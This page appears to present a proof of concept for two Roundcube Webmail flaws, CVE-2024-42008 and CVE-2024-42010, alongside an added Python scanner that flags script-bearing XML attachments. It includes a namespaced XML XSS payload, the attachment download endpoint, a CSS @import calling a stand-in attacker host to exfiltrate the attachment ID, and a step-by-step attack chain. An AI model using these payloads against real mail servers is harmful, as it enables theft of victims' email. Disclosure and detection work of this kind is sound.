
CVE-2024-42008 PoC — Roundcube Webmail 安全漏洞

Source
Associated Vulnerability
Title: Roundcube Webmail security vulnerability (CVE-2024-42008)
Description: Roundcube Webmail is a browser-based open-source IMAP client that supports address book management, message search, spell checking and more. Roundcube Webmail versions 1.5.7 and earlier, and 1.6.x versions before 1.6.8, contain a security vulnerability caused by a cross-site scripting flaw: a remote attacker can steal and send the victim's email through a malicious email attachment carrying a dangerous Content-Type header.
Description
PoC of Roundcube vulnerabilities CVE-2024-42008 and CVE-2024-42010
Readme
### Proof of Concept: CVE-2024-42008 and CVE-2024-42010

This proof of concept (PoC) demonstrates the exploitation of two vulnerabilities in Roundcube Webmail that enable CSS injection and cross-site scripting (XSS). The attack consists of two stages:

1. **XSS via malicious XML attachment (CVE-2024-42008)**
    
    Because of insufficient file upload checks, an XML file can be sent as an attachment with JavaScript code e.g.
    
    ```xml
    <something:script xmlns:something="http://www.w3.org/1999/xhtml">
    	alert(origin)
    </something:script>
    ```
    
    This was a known issue, tracked as CVE-2020-13965, and the mitigation was to disable the "Open attachment" option. But the file can still be accessed through the endpoint
    
    ```
    https://roundcube.host.com/?_task=mail&_mbox=INBOX&_uid=[UID]&_part=2&_download=0&_action=get
    ```
    
    Here UID is the unique identifier for this particular attachment in this particular mailbox (i.e. INBOX).
    ![](xss.png)
    
2. **HTML exfiltration via CSS injection (CVE-2024-42010)**
    
    When sending an email, it is possible to inject your own CSS file, provided it is hosted on a domain whose name starts with `a`. Through that and a JavaScript server file that processes the requests made by the vulnerable Roundcube host, it is possible to extract the UID of the malicious XSS attachment.
    
    Import the CSS in a sent email with
    
    ```html
    <style>
    	@import "//a.attackerdomain.com/start?"
    </style>
    ```
    
    Host the JS server (roundcube-css-exploit.js) that exfiltrates the UID of the malicious attachment.
    ![](css.png)

**Attack Chain**
 1. Host the JavaScript server on your domain
 2. Send an email with a malicious XML attachment and import the CSS from your domain
 3. The victim opens the email and the UID gets exfiltrated
 4. Depending on the preferred XSS delivery method, either send a second email containing the attachment link or redirect the user to it.
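As an added defensive example (not code from the PoC repository or from Sonar), the following Python mail-gateway check flags XML-typed attachments that carry a `script` or `style` element in the XHTML namespace; it resolves namespaces so the prefixed `something:script` form shown above is caught even though the bytes never contain `<script`. The MIME message, filenames and element blocklist are constructed for the demo.

```python
import email
from email import policy
from email.message import EmailMessage
from xml.etree import ElementTree as ET

XHTML_NS = "http://www.w3.org/1999/xhtml"
ACTIVE_TAGS = {"script", "style"}  # hypothetical blocklist of active XHTML elements
XML_TYPES = {"text/xml", "application/xml", "application/xhtml+xml", "image/svg+xml"}


def xhtml_active_elements(data: bytes) -> list[str]:
    """Return Clark-notation tags of XHTML script/style elements in an XML blob.

    Namespaces are resolved by the parser, so the PoC's prefixed 'something:script'
    is caught although the bytes never contain '<script'. For untrusted input in
    production, parse via defusedxml instead of the stock ElementTree.
    """
    try:
        root = ET.fromstring(data)
    except ET.ParseError:
        return []  # not well-formed XML: nothing for this check to flag
    return [el.tag for el in root.iter()
            if el.tag.startswith("{" + XHTML_NS + "}")
            and el.tag.split("}", 1)[1] in ACTIVE_TAGS]


def scan_message(raw: bytes) -> list[tuple[str, list[str]]]:
    """Return (filename, flagged_tags) for each XML-typed attachment with active content."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    findings = []
    for part in msg.iter_attachments():
        name = part.get_filename() or "(unnamed)"
        if (part.get_content_type() in XML_TYPES
                or name.lower().endswith((".xml", ".svg", ".xhtml"))):
            hits = xhtml_active_elements(part.get_payload(decode=True) or b"")
            if hits:
                findings.append((name, hits))
    return findings


def constructed_sample() -> bytes:
    """Constructed test message: one attachment carrying the PoC payload, one benign."""
    msg = EmailMessage()
    msg["From"], msg["To"], msg["Subject"] = "a@example.test", "b@example.test", "report"
    msg.set_content("see attachments")
    bad = (b'<something:script xmlns:something="http://www.w3.org/1999/xhtml">'
           b"alert(origin)</something:script>")
    msg.add_attachment(bad, maintype="text", subtype="xml", filename="report.xml")
    msg.add_attachment(b"<note/>", maintype="text", subtype="xml", filename="note.xml")
    return msg.as_bytes()
```

Running `scan_message(constructed_sample())` flags only `report.xml`; the benign `note.xml` passes because it contains no XHTML-namespaced active element.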

**Source: [Government Emails at Risk: Critical Cross-Site Scripting Vulnerability in Roundcube Webmail (Sonar's Vulnerability Research Team)](https://www.sonarsource.com/blog/government-emails-at-risk-critical-cross-site-scripting-vulnerability-in-roundcube-webmail/)**
File Snapshot

```
[4.0K] /data/pocs/011c8ae6a886f6dee6dec9936e8e8f055aa91f42
├── [208K] css.png
├── [2.2K] README.md
├── [3.1K] roundcube-css-exploit.js
└── [ 98K] xss.png

0 directories, 4 files
```